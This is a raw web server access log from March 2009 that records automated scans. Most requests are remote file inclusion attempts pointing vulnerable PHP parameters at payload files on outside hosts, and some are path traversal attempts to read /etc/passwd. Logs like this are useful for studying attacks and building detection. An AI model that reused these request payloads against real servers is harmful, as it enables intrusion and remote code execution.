77.221.130.2 - - [12/Mar/2009:22:21:31 -0500] "GET /logs/access_log.1214611200/appserv/main.php?appserv_root=http://www.lazar.ru/manager/processors/readme.txt?? HTTP/1.1" 404 327 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
77.221.130.2 - - [12/Mar/2009:22:24:07 -0500] "GET /logs/access_log.1214092800/appserv/main.php?appserv_root=http://www.lazar.ru/manager/processors/readme.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
77.221.130.2 - - [12/Mar/2009:22:24:07 -0500] "GET /logs/access_log.1214611200/appserv/main.php?appserv_root=http://www.lazar.ru/manager/processors/readme.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
77.221.130.15 - - [12/Mar/2009:22:25:16 -0500] "GET /logs/access_log.1214092800/appserv/main.php?appserv_root=http://www.lazar.ru/manager/processors/readme.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
77.221.130.15 - - [12/Mar/2009:22:25:17 -0500] "GET /logs/access_log.1214611200/appserv/main.php?appserv_root=http://www.lazar.ru/manager/processors/readme.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
83.17.183.214 - - [12/Mar/2009:22:25:47 -0500] "GET /logs/access_log.1216512000//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 337 "-""libwww-perl/5.65"
83.17.183.214 - - [12/Mar/2009:22:25:48 -0500] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.65"
83.17.183.214 - - [12/Mar/2009:22:25:50 -0500] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 315 "-""libwww-perl/5.65"
77.221.130.2 - - [12/Mar/2009:22:26:10 -0500] "GET /appserv/main.php?appserv_root=http://www.lazar.ru/manager/processors/readme.txt?? HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
77.221.130.2 - - [12/Mar/2009:22:26:10 -0500] "GET /logs/access_log.1216944000/appserv/main.php?appserv_root=http://www.lazar.ru/manager/processors/readme.txt?? HTTP/1.1" 404 327 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
77.221.130.2 - - [12/Mar/2009:22:26:10 -0500] "GET /logs/appserv/main.php?appserv_root=http://www.lazar.ru/manager/processors/readme.txt?? HTTP/1.1" 404 305 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
77.221.130.2 - - [12/Mar/2009:22:26:31 -0500] "GET /logs/appserv/main.php?appserv_root=http://www.lazar.ru/manager/processors/readme.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
77.221.130.2 - - [12/Mar/2009:22:26:31 -0500] "GET /logs/access_log.1216944000/appserv/main.php?appserv_root=http://www.lazar.ru/manager/processors/readme.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
77.221.130.2 - - [12/Mar/2009:22:26:31 -0500] "GET /appserv/main.php?appserv_root=http://www.lazar.ru/manager/processors/readme.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
77.221.130.15 - - [12/Mar/2009:22:26:36 -0500] "GET /logs/access_log.1214611200/appserv/main.php?appserv_root=http://www.lazar.ru/manager/processors/readme.txt?? HTTP/1.1" 404 327 "-""Mozilla/4.61 (Macintosh; I; PPC)"
77.221.130.15 - - [12/Mar/2009:22:26:36 -0500] "GET /logs/access_log.1214092800/appserv/main.php?appserv_root=http://www.lazar.ru/manager/processors/readme.txt?? HTTP/1.1" 404 327 "-""Mozilla/4.61 (Macintosh; I; PPC)"
77.221.130.2 - - [12/Mar/2009:22:26:43 -0500] "GET /logs/access_log.1217289600/appserv/main.php?appserv_root=http://www.lazar.ru/manager/processors/readme.txt?? HTTP/1.1" 404 327 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
77.221.130.2 - - [12/Mar/2009:22:26:57 -0500] "GET /logs/access_log.1217289600/appserv/main.php?appserv_root=http://www.lazar.ru/manager/processors/readme.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
69.43.201.9 - - [12/Mar/2009:22:27:17 -0500] "GET /logs/access_log.1217203200/?DOCUMENT_ROOT=http://www.aercoppo.it//assets/snippets/reflect/fx29id1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
69.43.201.9 - - [12/Mar/2009:22:27:37 -0500] "GET /logs/access_log.1217289600/?DOCUMENT_ROOT=http://www.aercoppo.it//assets/snippets/reflect/fx29id1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
147.83.175.41 - - [12/Mar/2009:22:27:51 -0500] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
89.111.173.113 - - [12/Mar/2009:22:27:57 -0500] "GET //poll/poll_ssi.php?include_path=http://www.renaultfreunde-erzgebirge.de/hk? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
58.226.23.55 - - [12/Mar/2009:22:28:13 -0500] "GET /logs/access_log.1219536000//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=uid=99(nobody)%20gid=4294967295%20groups=4294967295%20context=user_u:system_r:initrc_t%0A? HTTP/1.1" 404 370 "-""libwww-perl/5.79"
58.226.23.55 - - [12/Mar/2009:22:28:13 -0500] "GET /logs/access_log.1219536000//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=uid=99(nobody)%20gid=4294967295%20groups=4294967295%20context=user_u:system_r:initrc_t%0A? HTTP/1.1" 404 370 "-""libwww-perl/5.79"
58.226.23.55 - - [12/Mar/2009:22:28:13 -0500] "GET /logs/access_log.1219536000//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=uid=99(nobody)%20gid=4294967295%20groups=4294967295%20context=user_u:system_r:initrc_t%0A? HTTP/1.1" 404 370 "-""libwww-perl/5.79"
58.226.23.55 - - [12/Mar/2009:22:28:13 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=uid=99(nobody)%20gid=4294967295%20groups=4294967295%20context=user_u:system_r:initrc_t%0A? HTTP/1.1" 404 343 "-""libwww-perl/5.79"
58.226.23.55 - - [12/Mar/2009:22:28:13 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=uid=99(nobody)%20gid=4294967295%20groups=4294967295%20context=user_u:system_r:initrc_t%0A? HTTP/1.1" 404 343 "-""libwww-perl/5.79"
58.226.23.55 - - [12/Mar/2009:22:28:13 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=uid=99(nobody)%20gid=4294967295%20groups=4294967295%20context=user_u:system_r:initrc_t%0A? HTTP/1.1" 404 343 "-""libwww-perl/5.79"
58.226.23.55 - - [12/Mar/2009:22:28:14 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=uid=99(nobody)%20gid=4294967295%20groups=4294967295%20context=user_u:system_r:initrc_t%0A? HTTP/1.1" 404 348 "-""libwww-perl/5.79"
58.226.23.55 - - [12/Mar/2009:22:28:14 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=uid=99(nobody)%20gid=4294967295%20groups=4294967295%20context=user_u:system_r:initrc_t%0A? HTTP/1.1" 404 348 "-""libwww-perl/5.79"
58.226.23.55 - - [12/Mar/2009:22:28:14 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=uid=99(nobody)%20gid=4294967295%20groups=4294967295%20context=user_u:system_r:initrc_t%0A? HTTP/1.1" 404 348 "-""libwww-perl/5.79"
77.221.130.2 - - [12/Mar/2009:22:28:28 -0500] "GET /logs/access_log.1209600000/appserv/main.php?appserv_root=http://www.lazar.ru/manager/processors/readme.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
77.221.130.2 - - [12/Mar/2009:22:28:37 -0500] "GET /logs/access_log.1209600000/appserv/main.php?appserv_root=http://www.lazar.ru/manager/processors/readme.txt?? HTTP/1.1" 404 327 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
85.158.242.36 - - [12/Mar/2009:22:29:29 -0500] "GET /?DOCUMENT_ROOT=http://www.aercoppo.it//assets/snippets/reflect/fx29id1.txt? HTTP/1.1" 200 1243 "-""Mozilla/5.0"
85.158.242.36 - - [12/Mar/2009:22:29:29 -0500] "GET /logs/access_log.1217116800/?DOCUMENT_ROOT=http://www.aercoppo.it//assets/snippets/reflect/fx29id1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
85.158.242.36 - - [12/Mar/2009:22:29:30 -0500] "GET /logs/?DOCUMENT_ROOT=http://www.aercoppo.it//assets/snippets/reflect/fx29id1.txt? HTTP/1.1" 200 122039 "-""Mozilla/5.0"
147.83.175.41 - - [12/Mar/2009:22:29:34 -0500] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
147.83.175.41 - - [12/Mar/2009:22:29:35 -0500] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
210.118.170.11 - - [12/Mar/2009:22:30:06 -0500] "GET /logs//common/db.php?commonpath=http://okto.co.kr//zboard/include/tukulid.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
210.118.170.11 - - [12/Mar/2009:22:30:16 -0500] "GET /logs/access_log.1215216000//common/db.php?commonpath=http://okto.co.kr//zboard/include/tukulid.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
77.221.130.15 - - [12/Mar/2009:22:30:26 -0500] "GET /logs/access_log.1216944000/appserv/main.php?appserv_root=http://www.lazar.ru/manager/processors/readme.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
77.221.130.15 - - [12/Mar/2009:22:30:27 -0500] "GET /appserv/main.php?appserv_root=http://www.lazar.ru/manager/processors/readme.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
77.221.130.15 - - [12/Mar/2009:22:30:29 -0500] "GET /logs/appserv/main.php?appserv_root=http://www.lazar.ru/manager/processors/readme.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
77.221.130.15 - - [12/Mar/2009:22:30:51 -0500] "GET /logs/appserv/main.php?appserv_root=http://www.lazar.ru/manager/processors/readme.txt?? HTTP/1.1" 404 305 "-""Mozilla/4.61 (Macintosh; I; PPC)"
77.221.130.15 - - [12/Mar/2009:22:30:51 -0500] "GET /appserv/main.php?appserv_root=http://www.lazar.ru/manager/processors/readme.txt?? HTTP/1.1" 404 300 "-""Mozilla/4.61 (Macintosh; I; PPC)"
77.221.130.15 - - [12/Mar/2009:22:30:51 -0500] "GET /logs/access_log.1216944000/appserv/main.php?appserv_root=http://www.lazar.ru/manager/processors/readme.txt?? HTTP/1.1" 404 327 "-""Mozilla/4.61 (Macintosh; I; PPC)"
77.221.130.15 - - [12/Mar/2009:22:30:54 -0500] "GET /logs/access_log.1217289600/appserv/main.php?appserv_root=http://www.lazar.ru/manager/processors/readme.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
77.221.130.15 - - [12/Mar/2009:22:31:24 -0500] "GET /logs/access_log.1217289600/appserv/main.php?appserv_root=http://www.lazar.ru/manager/processors/readme.txt?? HTTP/1.1" 404 327 "-""Mozilla/4.61 (Macintosh; I; PPC)"
147.83.175.41 - - [12/Mar/2009:22:31:43 -0500] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
147.83.175.41 - - [12/Mar/2009:22:31:44 -0500] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
147.83.175.41 - - [12/Mar/2009:22:31:44 -0500] "GET /logs/access_log.1216944000//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
147.83.175.41 - - [12/Mar/2009:22:31:45 -0500] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
147.83.175.41 - - [12/Mar/2009:22:31:45 -0500] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
147.83.175.41 - - [12/Mar/2009:22:31:56 -0500] "GET /logs/access_log.1216512000//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
96.9.45.2 - - [12/Mar/2009:22:31:57 -0500] "GET /logs/access_log.1217030400/index.php?path=http://bbcw.info/safe1.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.810"
96.9.45.2 - - [12/Mar/2009:22:31:57 -0500] "GET /index.php?path=http://bbcw.info/safe1.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.810"
96.9.45.2 - - [12/Mar/2009:22:31:57 -0500] "GET /logs/index.php?path=http://bbcw.info/safe1.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
148.202.29.8 - - [12/Mar/2009:22:32:07 -0500] "GET /logs/access_log.1219449600/browse.php/header.php?prefix=http://star.jbsc.ac.kr/technote/config/menu/id.txt? HTTP/1.1" 404 332 "-""libwww-perl/5.803"
85.158.242.36 - - [12/Mar/2009:22:32:53 -0500] "GET /logs/access_log.1217116800%20%20/?DOCUMENT_ROOT=http://www.aercoppo.it//assets/snippets/reflect/fx29id1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
77.221.130.15 - - [12/Mar/2009:22:33:02 -0500] "GET /logs/access_log.1209600000/appserv/main.php?appserv_root=http://www.lazar.ru/manager/processors/readme.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
77.221.130.15 - - [12/Mar/2009:22:33:19 -0500] "GET /logs/access_log.1209600000/appserv/main.php?appserv_root=http://www.lazar.ru/manager/processors/readme.txt?? HTTP/1.1" 404 327 "-""Mozilla/4.61 (Macintosh; I; PPC)"
77.221.130.2 - - [12/Mar/2009:22:33:30 -0500] "GET /logs/access_log.1216684800/appserv/main.php?appserv_root=http://www.lazar.ru/manager/processors/readme.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
81.169.143.242 - - [12/Mar/2009:22:33:37 -0500] "GET /logs/access_log.1219881600/claroline/inc/claro_init_header.inc.php?includePath=http://kazandoska.ru/albid.txt?? HTTP/1.1" 404 350 "-""libwww-perl/5.69"
81.169.143.242 - - [12/Mar/2009:22:33:37 -0500] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://kazandoska.ru/albid.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.69"
81.169.143.242 - - [12/Mar/2009:22:33:38 -0500] "GET /logs/claroline/inc/claro_init_header.inc.php?includePath=http://kazandoska.ru/albid.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.69"
81.169.143.242 - - [12/Mar/2009:22:33:38 -0500] "GET /logs/access_log.1219968000/claroline/inc/claro_init_header.inc.php?includePath=http://kazandoska.ru/albid.txt?? HTTP/1.1" 404 350 "-""libwww-perl/5.69"
77.221.130.17 - - [12/Mar/2009:22:33:42 -0500] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://channels.dal.net/har/id.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
77.221.130.17 - - [12/Mar/2009:22:33:42 -0500] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://channels.dal.net/har/id.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
66.103.131.81 - - [12/Mar/2009:22:34:16 -0500] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.shopsmartcard.com/includes/js/tabs/files/bh.txt? HTTP/1.1" 404 349 "-""libwww-perl/5.811"
69.43.201.9 - - [12/Mar/2009:22:34:42 -0500] "GET /logs/access_log.1217116800/?DOCUMENT_ROOT=http://www.aercoppo.it//assets/snippets/reflect/fx29id1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
69.43.201.9 - - [12/Mar/2009:22:34:42 -0500] "GET /?DOCUMENT_ROOT=http://www.aercoppo.it//assets/snippets/reflect/fx29id1.txt? HTTP/1.1" 200 1243 "-""Mozilla/5.0"
69.43.201.9 - - [12/Mar/2009:22:34:43 -0500] "GET /logs/?DOCUMENT_ROOT=http://www.aercoppo.it//assets/snippets/reflect/fx29id1.txt? HTTP/1.1" 200 122039 "-""Mozilla/5.0"
82.226.108.61 - - [12/Mar/2009:22:34:54 -0500] "GET /logs/access_log.1219449600/admin/inc/include.php?language=0&lang_settings[0][1]=http://www.blixweb.no/rhey/software/Fire%20scan/idfire.txt? HTTP/1.1" 404 332 "-""libwww-perl/5.813"
82.226.108.61 - - [12/Mar/2009:22:34:54 -0500] "GET /admin/inc/include.php?language=0&lang_settings[0][1]=http://www.blixweb.no/rhey/software/Fire%20scan/idfire.txt? HTTP/1.1" 404 305 "-""libwww-perl/5.813"
82.226.108.61 - - [12/Mar/2009:22:34:55 -0500] "GET /logs/admin/inc/include.php?language=0&lang_settings[0][1]=http://www.blixweb.no/rhey/software/Fire%20scan/idfire.txt? HTTP/1.1" 404 310 "-""libwww-perl/5.813"
58.226.23.55 - - [12/Mar/2009:22:37:14 -0500] "GET /logs/access_log.1216684800//ashnews.php?pathtoashnews=uid=99(nobody)%20gid=4294967295%20groups=4294967295%20context=user_u:system_r:initrc_t%0A? HTTP/1.1" 404 323 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
58.226.23.55 - - [12/Mar/2009:22:37:14 -0500] "GET /logs/access_log.1216684800//ashnews.php?pathtoashnews=uid=99(nobody)%20gid=4294967295%20groups=4294967295%20context=user_u:system_r:initrc_t%0A? HTTP/1.1" 404 323 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
58.226.23.55 - - [12/Mar/2009:22:37:14 -0500] "GET /logs/access_log.1216684800//ashnews.php?pathtoashnews=uid=99(nobody)%20gid=4294967295%20groups=4294967295%20context=user_u:system_r:initrc_t%0A? HTTP/1.1" 404 323 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
58.226.23.55 - - [12/Mar/2009:22:37:15 -0500] "GET //ashnews.php?pathtoashnews=uid=99(nobody)%20gid=4294967295%20groups=4294967295%20context=user_u:system_r:initrc_t%0A? HTTP/1.1" 404 296 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
58.226.23.55 - - [12/Mar/2009:22:37:15 -0500] "GET //ashnews.php?pathtoashnews=uid=99(nobody)%20gid=4294967295%20groups=4294967295%20context=user_u:system_r:initrc_t%0A? HTTP/1.1" 404 296 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
58.226.23.55 - - [12/Mar/2009:22:37:15 -0500] "GET //ashnews.php?pathtoashnews=uid=99(nobody)%20gid=4294967295%20groups=4294967295%20context=user_u:system_r:initrc_t%0A? HTTP/1.1" 404 296 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
96.9.45.2 - - [12/Mar/2009:22:37:19 -0500] "GET /logs/access_log.1214956800/index.php?path=http://bbcw.info/safe1.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.810"
70.38.11.214 - - [12/Mar/2009:22:37:26 -0500] "GET /logs/access_log.1216944000//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 355 "-""libwww-perl/5.814"
70.38.11.214 - - [12/Mar/2009:22:37:26 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.814"
70.38.11.214 - - [12/Mar/2009:22:37:26 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.814"
70.38.11.214 - - [12/Mar/2009:22:37:27 -0500] "GET /logs/access_log.1216944000//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 355 "-""libwww-perl/5.814"
70.38.11.214 - - [12/Mar/2009:22:37:27 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.814"
70.38.11.214 - - [12/Mar/2009:22:37:27 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.814"
70.38.11.214 - - [12/Mar/2009:22:37:28 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.814"
70.38.11.214 - - [12/Mar/2009:22:37:28 -0500] "GET /logs/access_log.1216944000//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 355 "-""libwww-perl/5.814"
70.38.11.214 - - [12/Mar/2009:22:37:28 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.814"
69.43.201.9 - - [12/Mar/2009:22:37:31 -0500] "GET /logs/access_log.1217116800%20%20/?DOCUMENT_ROOT=http://www.aercoppo.it//assets/snippets/reflect/fx29id1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
58.226.23.55 - - [12/Mar/2009:22:37:44 -0500] "GET /logs/access_log.1214524800//atom.php5?page=uid=99(nobody)%20gid=4294967295%20groups=4294967295%20context=user_u:system_r:initrc_t%0A? HTTP/1.1" 404 321 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
58.226.23.55 - - [12/Mar/2009:22:37:44 -0500] "GET //atom.php5?page=uid=99(nobody)%20gid=4294967295%20groups=4294967295%20context=user_u:system_r:initrc_t%0A? HTTP/1.1" 404 294 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
70.38.11.214 - - [12/Mar/2009:22:37:52 -0500] "GET /logs/access_log.1211328000//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 355 "-""libwww-perl/5.814"
70.38.11.214 - - [12/Mar/2009:22:37:54 -0500] "GET /logs/access_log.1211328000//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 355 "-""libwww-perl/5.814"
70.38.11.214 - - [12/Mar/2009:22:37:55 -0500] "GET /logs/access_log.1211328000//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 355 "-""libwww-perl/5.814"
58.226.23.55 - - [12/Mar/2009:22:38:04 -0500] "GET /logs/access_log.1214524800//atom.php5?page=uid=99(nobody)%20gid=4294967295%20groups=4294967295%20context=user_u:system_r:initrc_t%0A? HTTP/1.1" 404 321 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
58.226.23.55 - - [12/Mar/2009:22:38:04 -0500] "GET //atom.php5?page=uid=99(nobody)%20gid=4294967295%20groups=4294967295%20context=user_u:system_r:initrc_t%0A? HTTP/1.1" 404 294 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
206.123.122.148 - - [12/Mar/2009:22:38:05 -0500] "GET /logs/access_log.1212019200/ask_password.php?dir=http://www.outbreak.castnet.org.au/safe.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.65"
206.123.122.148 - - [12/Mar/2009:22:38:05 -0500] "GET /ask_password.php?dir=http://www.outbreak.castnet.org.au/safe.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.65"
206.123.122.148 - - [12/Mar/2009:22:38:05 -0500] "GET /logs/ask_password.php?dir=http://www.outbreak.castnet.org.au/safe.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.65"
208.115.111.242 - - [12/Mar/2009:22:38:07 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
58.226.23.55 - - [12/Mar/2009:22:38:09 -0500] "GET /logs/access_log.1216857600//ashnews.php?pathtoashnews=uid=99(nobody)%20gid=4294967295%20groups=4294967295%20context=user_u:system_r:initrc_t%0A? HTTP/1.1" 404 323 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
58.226.23.55 - - [12/Mar/2009:22:38:10 -0500] "GET /logs/access_log.1216857600//ashnews.php?pathtoashnews=uid=99(nobody)%20gid=4294967295%20groups=4294967295%20context=user_u:system_r:initrc_t%0A? HTTP/1.1" 404 323 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
58.226.23.55 - - [12/Mar/2009:22:38:10 -0500] "GET /logs/access_log.1216857600//ashnews.php?pathtoashnews=uid=99(nobody)%20gid=4294967295%20groups=4294967295%20context=user_u:system_r:initrc_t%0A? HTTP/1.1" 404 323 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
58.226.23.55 - - [12/Mar/2009:22:38:10 -0500] "GET /logs/access_log.1214524800//atom.php5?page=uid=99(nobody)%20gid=4294967295%20groups=4294967295%20context=user_u:system_r:initrc_t%0A? HTTP/1.1" 404 321 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
58.226.23.55 - - [12/Mar/2009:22:38:10 -0500] "GET //atom.php5?page=uid=99(nobody)%20gid=4294967295%20groups=4294967295%20context=user_u:system_r:initrc_t%0A? HTTP/1.1" 404 294 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
147.83.175.41 - - [12/Mar/2009:22:39:16 -0500] "GET /logs/access_log.1219449600//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
210.118.170.11 - - [12/Mar/2009:22:39:44 -0500] "GET /logs/access_log.1217289600/errors.php?error=http://www.lazar.ru/manager/processors/copyright.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
91.52.190.23 - - [12/Mar/2009:22:39:56 -0500] "GET /logs//includes/user_confirmation.inc.php?include_path=http://www.madolddogs.de//flash/db/id2.txt?? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
91.52.190.23 - - [12/Mar/2009:22:39:56 -0500] "GET //includes/user_confirmation.inc.php?include_path=http://www.madolddogs.de//flash/db/id2.txt?? HTTP/1.1" 404 319 "-""libwww-perl/5.805"
